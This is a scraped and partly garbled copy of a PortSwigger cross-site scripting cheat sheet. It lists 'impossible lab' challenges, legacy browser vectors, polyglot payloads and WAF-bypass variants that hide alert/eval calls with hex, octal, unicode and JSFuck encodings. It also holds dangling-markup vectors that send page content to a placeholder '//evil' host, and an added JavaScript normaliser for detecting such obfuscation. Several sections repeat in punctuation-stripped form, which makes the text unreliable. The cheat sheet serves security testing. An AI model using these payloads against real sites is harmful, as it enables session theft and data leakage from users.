globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

Impossible labs

Title, description, length limit, closest vector

Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.

Script based injection but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.

innerHTML context but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.

Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters (<q/oncut=alert``) but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``

Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert``

Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q/oncut=eval(name)

Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link.

Injection occurs inside a frameset but before the body
We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.

Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.

Classic vectors (XSS crypt)

Image src with JavaScript protocol
<img src="javascript:alert(1)">

Body background with JavaScript protocol
<body background="javascript:alert(1)">

Iframe data URLs no longer work as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a>
<a href="" onclick="vbs:Msgbox+1">XSS</a>
<a href="" onclick="VBS:Msgbox+1">XSS</a>
<a href="" onclick="vbscript:Msgbox+1">XSS</a>
<a href="" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="" language="vbs" onclick="vbscript:Msgbox+1">XSS</a>



frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

XSS into a JavaScript string HieroglyphyJSFuck(globalThis)

globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])

Impossible labs

Classic vectors (XSS crypt)

Image src with JavaScript protocol ltimg src=javascriptalert(1)gt

Body background with JavaScript protocol ltbody background=javascriptalert(1)gt

Iframe data urls no longer work as modern browsersuse a null origin

ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt

Title Description Lengthlimit

Closest vector Link

Basic context WAFblocks lt[a-zA-Z]

This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag

NA NA 128279

Script based injectionbut quotes forwardslash and backslash areescaped

We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block

The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML

NA NA 128279

innerHTML context butno equals allowed

You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event

NA NA 128279

Basic context lengthlimit

This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it

15 ltq oncut=alert`` 128279

Attribute context lengthlimit

The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it

14 oncut=alert`` 128279

Basic context lengthlimit arbitrary code

Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code

19 ltqoncut=eval(name)

128279

Attribute context lengthlimit arbitrary code

Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript

17 See link 128279

Injection occurs inside aframeset but before thebody

We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy

NA NA 128279

Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed

The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`

NA NA 128279

VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt

JScript compact was a minimal version of JS thatwasnt widely used in IE

lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt

JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt

VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt

JavaScript entities used to work in NetscapeNavigator

lta title=ampalert(1)gtXSSltagt

JavaScript stylesheets used to be supported byNetscape Navigator

ltlink href=xssjs rel=stylesheet type=textjavascriptgt

Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme

IE9 select elements and plaintext used to consumemarkup

ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt

XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt

XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt

CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt

In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt

Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt

Older versions of IE supported event handlers infunctions

ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt

y

ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt

GreyMagic HTML+time exploit (no longer workseven in 5 docmode)

ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt

Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt

Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt

Firefox allows NULL characters inside openingcomments

lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt

Safari used to allow any tag to have a onload eventinside SVG

ltsvggtltxss onload=alert(1)gt

Isindex using src attribute ltisindex type=image src=evil

Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil

Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt

Isindex and action ltisindex type=submit action=javascriptalert(1)gt

CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes

This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher

You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request

Page 16: Cross-site scripting (XSS) cheat sheet - PortSwigger€¦ · Cross-site scripting (XSS) cheat sheet This cross-site scripting (XSS) cheat sheet contains many vectors that can help

Embed src
<embed src=//evil?

Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil target='

Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="

Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="

Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/

Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src=//evil?

Polyglots

Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>

WAF bypass global objects

XSS into a JavaScript string, string concatenation (window)
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (self)
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (this)
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (top)
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (parent)
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (frames)
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, string concatenation (globalThis)
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])

XSS into a JavaScript string, comment syntax (window)
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (self)
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (this)
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (top)
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (parent)
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (frames)
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, comment syntax (globalThis)
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])

XSS into a JavaScript string, hex escape sequence (window)
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (self)
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (this)
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (top)
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (parent)
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (frames)
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence (globalThis)
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])

XSS into a JavaScript string, hex escape sequence and base64 encoded string (window)
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (self)
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (this)
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (top)
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent)
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames)
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis)
globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))

XSS into a JavaScript string, octal escape sequence (window)
window['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (self)
self['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (this)
this['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (top)
top['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (parent)
parent['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (frames)
frames['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, octal escape sequence (globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')

XSS into a JavaScript string, unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')

XSS into a JavaScript string, RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)

XSS into a JavaScript string, Hieroglyphy/JSFuck (window)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (self)
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (this)
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (top)
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])

XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
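The vectors above all defeat a filter that matches on the literal words alert, document or eval because the name is only assembled at run time. The following added example (not part of the cheat sheet or PortSwigger's code) is a text-only normaliser that undoes those string-level tricks, run over constructed copies of the window variants, so a filter or log review sees the identifier a payload resolves to; the function names, the SENSITIVE list and the symbol-ratio heuristic for JSFuck output are this example's own choices.

```javascript
// Added example, not part of the PortSwigger cheat sheet. Nothing here is executed:
// the functions rewrite the payload text into a canonical form and inspect it.
const SENSITIVE = new Set(["eval", "alert", "atob", "document", "domain"]);

// Decode \xHH, \uHHHH, \u{H...} and octal \ooo escapes inside a string literal body.
function decodeEscapes(body) {
  return body.replace(
    /\\(x[0-9a-fA-F]{2}|u\{[0-9a-fA-F]+\}|u[0-9a-fA-F]{4}|[0-7]{1,3}|[\s\S])/g,
    (_, e) => {
      if (e[0] === "x") return String.fromCharCode(parseInt(e.slice(1), 16));
      if (e[0] === "u") return String.fromCodePoint(parseInt(e[1] === "{" ? e.slice(2, -1) : e.slice(1), 16));
      if (/^[0-7]/.test(e)) return String.fromCharCode(parseInt(e, 8));
      return e; // \' \" \\ and friends: keep the character itself
    }
  );
}

function fromBase64(b64) {
  return typeof atob === "function" ? atob(b64) : Buffer.from(b64, "base64").toString("latin1");
}

// Canonical form: no block comments, every string literal single-quoted and
// escape-free, adjacent literals joined, /re/.source replaced by the text it yields.
function normalize(src) {
  let s = src.replace(/\/\*[\s\S]*?\*\//g, "");
  s = s.replace(/\/((?:\\.|[^\/\\\n])+)\/[gimsuy]*\.source/g, (_, re) => `'${re}'`);
  s = s.replace(/(['"`])((?:\\.|(?!\1)[^\\\n])*)\1/g,
    (_, q, body) => "'" + decodeEscapes(body).replace(/'/g, "\\'") + "'");
  let prev;
  do {
    prev = s;
    s = s.replace(/'((?:\\.|[^'\\])*)'\s*\+\s*'((?:\\.|[^'\\])*)'/g, "'$1$2'");
  } while (s !== prev);
  return s;
}

// Report which sensitive names the fragment reaches, plus any base64 handed to atob.
function analyze(src) {
  const normalized = normalize(src);
  const identifiers = new Set();
  for (const m of normalized.matchAll(/[A-Za-z_$][\w$]*/g)) {
    if (SENSITIVE.has(m[0])) identifiers.add(m[0]);
  }
  const base64Decoded = [];
  for (const m of normalized.matchAll(/atob(?:'\])?\('([A-Za-z0-9+\/=]+)'\)/g)) {
    base64Decoded.push(fromBase64(m[1]));
  }
  return { normalized, identifiers: [...identifiers].sort(), base64Decoded };
}

// Hieroglyphy/JSFuck output carries no string literals to decode, so flag it by
// shape: almost every character is one of [ ] ( ) + ! { }.
function looksLikeJsfuck(src) {
  const symbols = (src.match(/[\[\]()+!{}]/g) || []).length;
  return src.length > 20 && symbols / src.length > 0.7;
}

// Constructed samples: the window variants from the section above.
const SAMPLES = {
  concat: "window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])",
  comment: "window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])",
  hexBase64: "window['\\x65\\x76\\x61\\x6c'](window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x61\\x74\\x6f\\x62']('WFNT')))",
  octal: "window['\\141\\154\\145\\162\\164']('\\130\\123\\123')",
  unicode: "window['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  regexSource: "window[/al/.source+/ert/.source](/XSS/.source)",
  jsfuck: "window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])",
};

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, payload] of Object.entries(SAMPLES)) {
    const r = analyze(payload);
    console.log(name.padEnd(12), r.identifiers.join(",").padEnd(22), looksLikeJsfuck(payload) ? "[jsfuck-shaped]" : r.normalized);
  }
}
```

Every sample except the JSFuck one normalises to the same short form a keyword rule would have caught in the first place; the JSFuck one yields no identifiers at all, which is why the shape check is needed as a second signal.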

Impossible labs

Title: Basic context, WAF blocks <[a-zA-Z]
Description: This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A
Closest vector: N/A

Title: Script based injection but quotes, forward slash and backslash are escaped
Description: We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A
Closest vector: N/A

Title: innerHTML context but no equals allowed
Description: You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A
Closest vector: N/A

Title: Basic context, length limit
Description: This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters (<q/oncut=alert``), but can you beat it?
Length limit: 15
Closest vector: <q oncut=alert``

Title: Attribute context, length limit
Description: The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14
Closest vector: oncut=alert`` (with a trailing space)

Title: Basic context, length limit, arbitrary code
Description: It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19
Closest vector: <q/oncut=eval(name)

Title: Attribute context, length limit, arbitrary code
Description: Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17
Closest vector: See link

Title: Injection occurs inside a frameset but before the body
Description: We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A
Closest vector: N/A

Title: Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
Description: The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A
Closest vector: N/A

Classic vectors (XSS crypt)

Image src with JavaScript protocol
<img src=javascript:alert(1)>

Body background with JavaScript protocol
<body background=javascript:alert(1)>

Iframe data URLs (no longer work, as modern browsers use a null origin)
<iframe src=data:text/html,<img src=1 onerror=alert(document.domain)>>

VBScript protocol (used to work in IE)
<a href=vbscript:MsgBox+1>XSS</a>
<a href='' onclick=vbs:Msgbox+1>XSS</a>
<a href='' onclick=VBS:Msgbox+1>XSS</a>
<a href='' onclick=vbscript:Msgbox+1>XSS</a>
<a href='' onclick=VBSCRIPT:Msgbox+1>XSS</a>
<a href='' language=vbs onclick=vbscript:Msgbox+1>XSS</a>

JScript compact (a minimal version of JS that wasn't widely used in IE)
<a href='' onclick=jscript.compact:alert(1)>test</a>
<a href='' onclick=JSCRIPT.COMPACT:alert(1)>test</a>

JScript.Encode (allows encoded JavaScript)
<a href='' language=JScript.Encode onclick='#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@'>XSS</a>
<a href='' onclick='JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@'>XSS</a>

VBScript.Encode (allows encoded VBScript)
<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities (used to work in Netscape Navigator)
<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets (used to be supported by Netscape Navigator)
<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup
<form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL (Firefox only, <= 2)
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-\mo\z-binding:\url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style=-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>
<div style=-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>

XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">

CSS expressions (<= IE7)
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
